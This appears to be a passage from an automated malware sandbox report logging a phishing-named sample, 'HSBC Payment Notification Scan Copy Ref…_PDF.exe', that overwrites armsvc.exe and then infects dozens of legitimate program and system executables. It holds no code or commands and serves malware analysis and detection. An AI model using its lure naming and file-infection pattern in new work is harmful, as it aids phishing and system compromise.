              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Infects executable files (exe, dll, sys, html)
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbem\WmiApSrv.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\pingsender.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\vds.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\alg.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zFM.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\snmptrap.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Spectrum.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\Locator.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7z.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Windows\System32\AppVClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\notification_helper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\SysWOW64\perfhost.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\7zG.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msiexec.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\VSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\wbengine.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SearchIndexer.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\private_browsing.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\TieringEngineService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\firefox.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\updater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\chrome_pwa_launcher.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\AgentService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\7-Zip\Uninstall.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\chrome_proxy.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\FXSSVC.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\OpenSSH\ssh-agent.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Google\Chrome\Application\117.0.5938.134\elevation_service.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\SensorDataService.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Windows\System32\msdtc.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSystem file written: C:\Program Files\Mozilla Firefox\plugin-container.exeJump to behavior
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: \hsbc payment notification scan copy ref 62587299-24_pdf.exe
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: \hsbc payment notification scan copy ref 62587299-24_pdf.exeJump to behavior
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\pingsender.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\vds.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\snmptrap.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Spectrum.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Windows Media Player\wmpnetwk.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\Locator.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\default-browser-agent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7z.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Google\Chrome\Application\117.0.5938.134\Installer\chrmstp.exeJump to dropped file
              Source: C:\Users\user\Desktop\HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exeFile created: C:\Windows\System32\AppVClient.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Mozilla Firefox\crashreporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\SysWOW64\perfhost.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\7-Zip\7zG.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Windows\System32\msiexec.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exeJump to dropped file
              Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
